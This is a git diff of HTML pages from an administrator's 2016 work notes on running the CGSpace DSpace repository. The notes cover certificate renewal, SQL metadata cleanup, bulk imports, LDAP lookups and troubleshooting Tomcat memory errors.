      • CGSpace’s HTTPS certificate expired last night and I didn’t notice, had to renew:
      -
      # /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook "/usr/bin/service nginx stop" --post-hook "/usr/bin/service nginx start"
      +
      # /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook "/usr/bin/service nginx stop" --post-hook "/usr/bin/service nginx start"
       
      • I really need to fix that cron job…
      @@ -328,8 +328,8 @@ UPDATE 960
      • Run the replacements/deletes for dc.description.sponsorship (investors) on CGSpace:
      -
      $ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t 'correct investor' -m 29 -d cgspace -p 'fuuu' -u cgspace
      -$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p 'fuuu' -u cgspace
      +
      $ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t 'correct investor' -m 29 -d cgspace -p 'fuuu' -u cgspace
      +$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p 'fuuu' -u cgspace
       
      • The scripts for this are here:
          @@ -367,9 +367,9 @@ $ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.spons
      • Run all cleanups and deletions of dc.contributor.corporate on CGSpace:
      -
      $ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t 'Correct style' -m 126 -d cgspace -u cgspace -p 'fuuu'
      -$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t 'should be' -m 126 -d cgspace -u cgspace -p 'fuuu'
      -$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p 'fuuu'
      +
      $ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t 'Correct style' -m 126 -d cgspace -u cgspace -p 'fuuu'
      +$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t 'should be' -m 126 -d cgspace -u cgspace -p 'fuuu'
      +$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p 'fuuu'
       
      • Re-deploy CGSpace and DSpace Test with latest June changes
      • Now the sharing and Altmetric bits are more prominent:
      • @@ -383,11 +383,11 @@ $ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-D
        • Wow, there are 95 authors in the database who have ‘,’ at the end of their name:
        -
        # select text_value from  metadatavalue where metadata_field_id=3 and text_value like '%,';
        +
        # select text_value from  metadatavalue where metadata_field_id=3 and text_value like '%,';
         
        • We need to use something like this to fix them, need to write a proper regex later:
        -
        # update metadatavalue set text_value = regexp_replace(text_value, '(Poole, J),', '\1') where metadata_field_id=3 and text_value = 'Poole, J,';
        +
        # update metadatavalue set text_value = regexp_replace(text_value, '(Poole, J),', '\1') where metadata_field_id=3 and text_value = 'Poole, J,';
         
        diff --git a/docs/2016-07/index.html b/docs/2016-07/index.html index 041966912..5577bcce7 100644 --- a/docs/2016-07/index.html +++ b/docs/2016-07/index.html @@ -44,7 +44,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and In this case the select query was showing 95 results before the update "/> - + @@ -135,9 +135,9 @@ In this case the select query was showing 95 results before the update
      • Add dc.description.sponsorship to Discovery sidebar facets and make investors clickable in item view (#232)
      • I think this query should find and replace all authors that have “,” at the end of their names:
      -
      dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
      +
      dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
       UPDATE 95
      -dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
      +dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
        text_value
       ------------
       (0 rows)
      @@ -158,7 +158,7 @@ dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and
       
    • We really only need statistics and authority but meh
    • Fix metadata for species on DSpace Test:
    -
    $ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p 'fuuu'
     
    • Will run later on CGSpace
    • A user is still having problems with Sherpa/Romeo causing crashes during the submission process when the journal is “ungraded”
    • @@ -169,7 +169,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
      • Delete 23 blank metadata values from CGSpace:
      -
      cgspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
      +
      cgspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
       DELETE 23
       
      • Complete phase three of metadata migration, for the following fields: @@ -188,9 +188,9 @@ DELETE 23
      • Also, run fixes and deletes for species and author affiliations (over 1000 corrections!)
      -
      $ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p 'fuuu'
      -$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p 'fuuu'
      -$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p 'fuuu'
      +
      $ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p 'fuuu'
      +$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p 'fuuu'
      +$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p 'fuuu'
       
      • I then ran all server updates and rebooted the server
      @@ -221,7 +221,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
      • I suspect it’s someone hitting REST too much:
      -
      # awk '{print $1}' /var/log/nginx/rest.log  | sort -n | uniq -c | sort -h | tail -n 3
      +
      # awk '{print $1}' /var/log/nginx/rest.log  | sort -n | uniq -c | sort -h | tail -n 3
           710 66.249.78.38
          1781 181.118.144.29
         24904 70.32.99.142
      diff --git a/docs/2016-08/index.html b/docs/2016-08/index.html
      index d2b0f5be6..8ee34ba3e 100644
      --- a/docs/2016-08/index.html
      +++ b/docs/2016-08/index.html
      @@ -42,7 +42,7 @@ $ git checkout -b 55new 5_x-prod
       $ git reset --hard ilri/5_x-prod
       $ git rebase -i dspace-5.5
       "/>
      -
      +
       
       
           
      @@ -166,7 +166,7 @@ $ git rebase -i dspace-5.5
       
    • Fix item display incorrectly displaying Species when Breeds were present (#260)
    • Experiment with fixing more authors, like Delia Grace:
    -
    dspacetest=# update metadatavalue set authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where metadata_field_id=3 and text_value='Grace, D.';
    +
    dspacetest=# update metadatavalue set authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where metadata_field_id=3 and text_value='Grace, D.';
     

    2016-08-06

    • Finally figured out how to remove “View/Open” and “Bitstreams” from the item view
    • @@ -184,8 +184,8 @@ $ git rebase -i dspace-5.5
    • Install latest Oracle Java 8 JDK
    • Create setenv.sh in Tomcat 8 libexec/bin directory:
    -
    CATALINA_OPTS="-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8"
    -CATALINA_OPTS="$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib"
    +
    CATALINA_OPTS="-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8"
    +CATALINA_OPTS="$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib"
     
     JRE_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_102.jdk/Contents/Home
     
      @@ -246,7 +246,7 @@ $ ln -sv ~/dspace/webapps/solr /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/sol
    • Fix “CONGO,DR” country name in input-forms.xml (#264)
    • Also need to fix existing records using the incorrect form in the database:
    -
    dspace=# update metadatavalue set text_value='CONGO, DR' where resource_type_id=2 and metadata_field_id=228 and text_value='CONGO,DR';
    +
    dspace=# update metadatavalue set text_value='CONGO, DR' where resource_type_id=2 and metadata_field_id=228 and text_value='CONGO,DR';
     
    • I asked a question on the DSpace mailing list about updating “preferred” forms of author names from ORCID
    @@ -300,12 +300,12 @@ Database Driver: PostgreSQL Native Driver version PostgreSQL 9.1 JDBC4 (build 90
  • Talk to Atmire about the DSpace 5.5 issue, and it seems to be caused by a bug in FlywayDB
  • They said I should delete the Atmire migrations
  • -
    dspacetest=# delete from schema_version where description =  'Atmire CUA 4 migration' and version='5.1.2015.12.03.2';
    -dspacetest=# delete from schema_version where description =  'Atmire MQM migration' and version='5.1.2015.12.03.3';
    +
    dspacetest=# delete from schema_version where description =  'Atmire CUA 4 migration' and version='5.1.2015.12.03.2';
    +dspacetest=# delete from schema_version where description =  'Atmire MQM migration' and version='5.1.2015.12.03.3';
     
    • After that DSpace starts up by XMLUI now has unrelated issues that I need to solve!
    -
    org.apache.avalon.framework.configuration.ConfigurationException: Type 'ThemeResourceReader' does not exist for 'map:read' at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
    +
    org.apache.avalon.framework.configuration.ConfigurationException: Type 'ThemeResourceReader' does not exist for 'map:read' at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
     context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
     
    • Looks like we’re missing some stuff in the XMLUI module’s sitemap.xmap, as well as in each of our XMLUI themes
    • @@ -324,13 +324,13 @@ context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
    • Clean up and import 48 CCAFS records into DSpace Test
    • SQL to get all journal titles from dc.source (55), since it’s apparently used for internal DSpace filename shit, but we moved all our journal titles there a few months ago:
    -
    dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ '.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*';
    +
    dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ '.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*';
     

    2016-08-25

    • Atmire suggested adding a missing bean to dspace/config/spring/api/atmire-cua.xml but it doesn’t help:
    ...
    -Error creating bean with name 'MetadataStorageInfoService'
    +Error creating bean with name 'MetadataStorageInfoService'
     ...
     
    • Atmire sent an updated version of dspace/config/spring/api/atmire-cua.xml and now XMLUI starts but gives a null pointer exception:
    • @@ -351,7 +351,7 @@ Error creating bean with name 'MetadataStorageInfoService'
    • Import the 47 CCAFS records to CGSpace, creating the SimpleArchiveFormat bundles and importing like:
    $ ./safbuilder.sh -c /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/3546.csv
    -$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
    +$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
     
    • Finally got DSpace 5.5 working with the Atmire modules after a few rounds of back and forth with Atmire devs
    diff --git a/docs/2016-09/index.html b/docs/2016-09/index.html index 1cc0df08e..1caf406c8 100644 --- a/docs/2016-09/index.html +++ b/docs/2016-09/index.html @@ -14,7 +14,7 @@ Discuss how the migration of CGIAR’s Active Directory to a flat structure We had been using DC=ILRI to determine whether a user was ILRI or not It looks like we might be able to use OUs now, instead of DCs: -$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)" +$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)" " /> @@ -32,9 +32,9 @@ Discuss how the migration of CGIAR’s Active Directory to a flat structure We had been using DC=ILRI to determine whether a user was ILRI or not It looks like we might be able to use OUs now, instead of DCs: -$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)" +$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)" "/> - + @@ -127,7 +127,7 @@ $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=or
  • We had been using DC=ILRI to determine whether a user was ILRI or not
  • It looks like we might be able to use OUs now, instead of DCs:
  • -
    $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
    +
    $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
     
    • User who has been migrated to the root vs user still in the hierarchical structure:
    @@ -142,15 +142,15 @@ distinguishedName: CN=Last\, First (ILRI),OU=ILRI Ethiopia Employees,OU=ILRI Eth
    $ dropdb dspacetest
     $ createdb -O dspacetest --encoding=UNICODE dspacetest
    -$ psql dspacetest -c 'alter user dspacetest createuser;'
    +$ psql dspacetest -c 'alter user dspacetest createuser;'
     $ pg_restore -O -U dspacetest -d dspacetest ~/Downloads/cgspace_2016-09-01.backup
    -$ psql dspacetest -c 'alter user dspacetest nocreateuser;'
    +$ psql dspacetest -c 'alter user dspacetest nocreateuser;'
     $ psql -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest -h localhost
     $ vacuumdb dspacetest
     
    • Some names that I thought I fixed in July seem not to be:
    -
    dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
    +
    dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
           text_value       |              authority               | confidence
     -----------------------+--------------------------------------+------------
      Poole, Elizabeth Jane | b6efa27f-8829-4b92-80fe-bc63e03e3ccb |        600
    @@ -163,12 +163,12 @@ $ vacuumdb dspacetest
     
    • At least a few of these actually have the correct ORCID, but I will unify the authority to be c3a22456-8d6a-41f9-bba0-de51ef564d45
    -
    dspacetest=# update metadatavalue set authority='c3a22456-8d6a-41f9-bba0-de51ef564d45', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
    +
    dspacetest=# update metadatavalue set authority='c3a22456-8d6a-41f9-bba0-de51ef564d45', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
     UPDATE 69
     
    • And for Peter Ballantyne:
    -
    dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
    +
    dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
         text_value     |              authority               | confidence
     -------------------+--------------------------------------+------------
      Ballantyne, Peter | 2dcbcc7b-47b0-4fd7-bef9-39d554494081 |        600
    @@ -180,26 +180,26 @@ UPDATE 69
     
    • Again, a few have the correct ORCID, but there should only be one authority…
    -
    dspacetest=# update metadatavalue set authority='4f04ca06-9a76-4206-bd9c-917ca75d278e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
    +
    dspacetest=# update metadatavalue set authority='4f04ca06-9a76-4206-bd9c-917ca75d278e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
     UPDATE 58
     
    • And for me:
    -
    dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, A%';
    +
    dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, A%';
      text_value |              authority               | confidence
     ------------+--------------------------------------+------------
      Orth, Alan | 4884def0-4d7e-4256-9dd4-018cd60a5871 |        600
      Orth, A.   | 4884def0-4d7e-4256-9dd4-018cd60a5871 |        600
      Orth, A.   | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
     (3 rows)
    -dspacetest=# update metadatavalue set authority='1a1943a0-3f87-402f-9afe-e52fb46a513e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, %';
    +dspacetest=# update metadatavalue set authority='1a1943a0-3f87-402f-9afe-e52fb46a513e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, %';
     UPDATE 11
     
    • And for CCAFS author Bruce Campbell that I had discussed with CCAFS earlier this week:
    -
    dspacetest=# update metadatavalue set authority='0e414b4c-4671-4a23-b570-6077aca647d8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
    +
    dspacetest=# update metadatavalue set authority='0e414b4c-4671-4a23-b570-6077aca647d8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
     UPDATE 166
    -dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
    +dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
            text_value       |              authority               | confidence
     ------------------------+--------------------------------------+------------
      Campbell, Bruce        | 0e414b4c-4671-4a23-b570-6077aca647d8 |        600
    @@ -215,18 +215,18 @@ dspacetest=# select distinct text_value, authority, confidence from metadatavalu
     
    • After one week of logging TLS connections on CGSpace:
    -
    # zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
    +
    # zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
     217
     # zcat -f -- /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
     1164376
    -# zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk '{print $6}' | sort | uniq
    +# zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk '{print $6}' | sort | uniq
     TLSv1/DES-CBC3-SHA
     TLSv1/EDH-RSA-DES-CBC3-SHA
     
    • So this represents 0.02% of 1.16M connections over a one-week period
    • Transforming some filenames in OpenRefine so they can have a useful description for SAFBuilder:
    -
    value + "__description:" + cells["dc.type"].value
    +
    value + "__description:" + cells["dc.type"].value
     
    • This gives you, for example: Mainstreaming gender in agricultural R&D.pdf__description:Brief
    @@ -251,7 +251,7 @@ TLSv1/EDH-RSA-DES-CBC3-SHA
  • If I unzip the original zip from CIAT on Windows, re-zip it with 7zip on Windows, and then unzip it on Linux directly, the file names seem to be proper UTF-8
  • We should definitely clean filenames so they don’t use characters that are tricky to process in CSV and shell scripts, like: ,, ', and "
  • -
    value.replace("'","").replace(",","").replace('"','')
    +
    value.replace("'","").replace(",","").replace('"','')
     
    • I need to write a Python script to match that for renaming files in the file system
    • When importing SAF bundles it seems you can specify the target collection on the command line using -c 10568/4003 or in the collections file inside each item in the bundle
    • @@ -264,7 +264,7 @@ TLSv1/EDH-RSA-DES-CBC3-SHA
    • Import CIAT Gender Network records to CGSpace, first creating the SAF bundles as my user, then importing as the tomcat7 user, and deleting the bundle, for each collection’s items:
    $ ./safbuilder.sh -c /home/aorth/ciat-gender-2016-09-06/66601.csv
    -$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
    +$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
     $ rm -rf ~/ciat-gender-2016-09-06/SimpleArchiveFormat/
     

    2016-09-07

      @@ -299,13 +299,13 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
    • I restarted Tomcat and it was ok again
    • CGSpace crashed a few hours later, errors from catalina.out:
    -
    Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
    +
    Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
             at java.lang.StringCoding.decode(StringCoding.java:215)
     
    • We haven’t seen that in quite a while…
    • Indeed, in a month of logs it only occurs 15 times:
    -
    # grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
    +
    # grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
     15
     
    • I also see a bunch of errors from dspace.log:
    • @@ -315,11 +315,11 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
    • Looking at REST requests, it seems there is one IP hitting us nonstop:
    -
    # awk '{print $1}' /var/log/nginx/rest.log  | sort -n | uniq -c | sort -h | tail -n 3
    +
    # awk '{print $1}' /var/log/nginx/rest.log  | sort -n | uniq -c | sort -h | tail -n 3
         820 50.87.54.15
       12872 70.32.99.142
       25744 70.32.83.92
    -# awk '{print $1}' /var/log/nginx/rest.log.1  | sort -n | uniq -c | sort -h | tail -n 3
    +# awk '{print $1}' /var/log/nginx/rest.log.1  | sort -n | uniq -c | sort -h | tail -n 3
        7966 181.118.144.29
       54706 70.32.99.142
      109412 70.32.83.92
    @@ -333,7 +333,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
     
    • And more heap space errors:
    -
    # grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
    +
    # grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
     19
     
    • There are no more rest requests since the last crash, so maybe there are other things causing this.
    • @@ -349,7 +349,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
    • From the activity control panel I can see 58 unique IPs hitting the site concurrently, which has GOT to hurt our stability
    • A list of all 2000 unique IPs from CGSpace logs today:
    -
    # grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: '{print $5}' | sort -n | uniq -c | sort -h | tail -n 100
    +
    # grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: '{print $5}' | sort -n | uniq -c | sort -h | tail -n 100
     
    • Looking at the top 20 IPs or so, most are Yahoo, MSN, Google, Baidu, TurnitIn (iParadigm), etc… do we have any real users?
    • Generate a list of all author affiliations for Peter Ballantyne to go through, make corrections, and create a lookup list from:
    • @@ -363,7 +363,7 @@ Wed Sep 14 09:47:28 UTC 2016 | Updating : 6/6 docs. Commit Commit done dn:CN=Haman\, Magdalena (CIAT-CCAFS),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org -Exception in thread "http-bio-127.0.0.1-8081-exec-193" java.lang.OutOfMemoryError: Java heap space +Exception in thread "http-bio-127.0.0.1-8081-exec-193" java.lang.OutOfMemoryError: Java heap space
    • And after that I see a bunch of “pool error Timeout waiting for idle object”
    • Later, near the time of the next crash I see:
    • @@ -376,7 +376,7 @@ Commit done Sep 14, 2016 11:32:22 AM com.sun.jersey.server.wadl.generators.WadlGeneratorJAXBGrammarGenerator buildModelAndSchemas SEVERE: Failed to generate the schema for the JAX-B elements com.sun.xml.bind.v2.runtime.IllegalAnnotationsException: 2 counts of IllegalAnnotationExceptions -java.util.Map is an interface, and JAXB can't handle interfaces. +java.util.Map is an interface, and JAXB can't handle interfaces. this problem is related to the following location: at java.util.Map at public java.util.Map com.atmire.dspace.rest.common.Statlet.getRender() @@ -389,7 +389,7 @@ java.util.Map does not have a no-arg default constructor.
    • Then 20 minutes later another outOfMemoryError:
    -
    Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
    +
    Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
             at java.lang.StringCoding.decode(StringCoding.java:215)
     
    • Perhaps these particular issues are memory issues, the munin graphs definitely show some weird purging/allocating behavior starting this week
    • @@ -402,7 +402,7 @@ java.util.Map does not have a no-arg default constructor.
    • Oh great, the configuration on the actual server is different than in configuration management!
    • Seems we added a bunch of settings to the /etc/default/tomcat7 in December, 2015 and never updated our ansible repository:
    -
    JAVA_OPTS="-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts"
    +
    JAVA_OPTS="-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts"
     
    • So I’m going to bump the heap +512m and remove all the other experimental shit (and update ansible!)
    • Increased JVM heap to 4096m on CGSpace (linode01)
    • @@ -423,14 +423,14 @@ Thu Sep 15 18:45:26 UTC 2016 | Updating : 200/218 docs. Thu Sep 15 18:45:27 UTC 2016 | Updating : 218/218 docs. Commit Commit done -Exception in thread "http-bio-127.0.0.1-8081-exec-247" java.lang.OutOfMemoryError: Java heap space -Exception in thread "http-bio-127.0.0.1-8081-exec-241" java.lang.OutOfMemoryError: Java heap space -Exception in thread "http-bio-127.0.0.1-8081-exec-243" java.lang.OutOfMemoryError: Java heap space -Exception in thread "http-bio-127.0.0.1-8081-exec-258" java.lang.OutOfMemoryError: Java heap space -Exception in thread "http-bio-127.0.0.1-8081-exec-268" java.lang.OutOfMemoryError: Java heap space -Exception in thread "http-bio-127.0.0.1-8081-exec-263" java.lang.OutOfMemoryError: Java heap space -Exception in thread "http-bio-127.0.0.1-8081-exec-280" java.lang.OutOfMemoryError: Java heap space -Exception in thread "Thread-54216" org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb +Exception in thread "http-bio-127.0.0.1-8081-exec-247" java.lang.OutOfMemoryError: Java heap space +Exception in thread "http-bio-127.0.0.1-8081-exec-241" java.lang.OutOfMemoryError: Java heap space +Exception in thread "http-bio-127.0.0.1-8081-exec-243" java.lang.OutOfMemoryError: Java heap space +Exception in thread "http-bio-127.0.0.1-8081-exec-258" java.lang.OutOfMemoryError: Java heap space +Exception in thread "http-bio-127.0.0.1-8081-exec-268" java.lang.OutOfMemoryError: Java heap space +Exception in thread "http-bio-127.0.0.1-8081-exec-263" java.lang.OutOfMemoryError: Java heap space +Exception in thread "http-bio-127.0.0.1-8081-exec-280" java.lang.OutOfMemoryError: Java heap space +Exception in thread "Thread-54216" org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb -e14ef82ee224 to the index; possible analysis error. at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552) at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210) @@ -443,7 +443,7 @@ Exception in thread "Thread-54216" org.apache.solr.client.solrj.impl.H
    • I bumped the heap space from 4096m to 5120m to see if this is really about heap speace or not.
    • Looking into some of these errors that I’ve seen this week but haven’t noticed before:
    -
    # zcat -f -- /var/log/tomcat7/catalina.* | grep -c 'Failed to generate the schema for the JAX-B elements'
    +
    # zcat -f -- /var/log/tomcat7/catalina.* | grep -c 'Failed to generate the schema for the JAX-B elements'
     113
     
    • I’ve sent a message to Atmire about the Solr error to see if it’s related to their batch update module
    • @@ -474,7 +474,7 @@ $ ./delete-metadata-values.py -f cg.contributor.affiliation -i affiliations_pb-2
    • Turns out the Solr search logic switched from OR to AND in DSpace 6.0 and the change is easy to backport: https://jira.duraspace.org/browse/DS-2809
